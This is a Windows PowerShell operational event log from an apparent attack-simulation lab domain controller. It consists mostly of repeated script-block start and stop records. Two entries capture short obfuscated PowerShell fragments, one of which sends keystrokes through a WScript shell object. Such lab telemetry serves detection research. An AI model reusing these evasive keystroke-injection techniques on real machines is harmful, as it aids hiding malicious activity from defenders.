Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476308
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476307
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476306
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476305
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476304
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476303
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476302
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476301
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476300
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476299
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476298
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476297
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476296
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476295
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476294
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476293
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476292
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476291
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476290
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476289
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476288
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476287
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476286
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476285
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476284
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476283
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476282
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476281
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476280
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476279
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476278
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476277
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476276
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476275
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476274
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476273
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476272
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1476271
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{(Item Variable:_).Value.id-ieq$curpid}

ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Path:
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476270
Keywords=None
Message=Completed invocation of ScriptBlock ID: 87554428-33de-4412-8eb8-929e6dd8ad48
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476269
Keywords=None
Message=Started invocation of ScriptBlock ID: 87554428-33de-4412-8eb8-929e6dd8ad48
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476268
Keywords=None
Message=Completed invocation of ScriptBlock ID: 87554428-33de-4412-8eb8-929e6dd8ad48
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476267
Keywords=None
Message=Started invocation of ScriptBlock ID: 87554428-33de-4412-8eb8-929e6dd8ad48
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1476266
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{$wshell.SendKeys((Variable _).Value)}

ScriptBlock ID: 87554428-33de-4412-8eb8-929e6dd8ad48
Path:
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=40962
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Console Startup
OpCode=Stop
RecordNumber=1476679
Keywords=None
Message=PowerShell console is ready for user input
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=53504
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Named Pipe IPC
OpCode=Open (async)
RecordNumber=1476678
Keywords=None
Message=Windows PowerShell has started an IPC listening thread on process: 7428 in AppDomain: DefaultAppDomain.
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=40961
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Console Startup
OpCode=Start
RecordNumber=1476677
Keywords=None
Message=PowerShell console is starting up
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476676
Keywords=None
Message=Started invocation of ScriptBlock ID: 1ef9c228-b78e-4897-b91e-9c995c7fd3bc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476675
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476674
Keywords=None
Message=Completed invocation of ScriptBlock ID: 7e434dd3-d70d-47fd-bebf-987ac7eb8aab
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476673
Keywords=None
Message=Started invocation of ScriptBlock ID: 7e434dd3-d70d-47fd-bebf-987ac7eb8aab
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476672
Keywords=None
Message=Started invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476671
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476670
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476669
Keywords=None
Message=Completed invocation of ScriptBlock ID: 18ebddec-0fe6-48a4-b9f0-8a4bb38ec99e
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476668
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9c6c5db8-4434-4099-96b7-7eff0b918e23
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
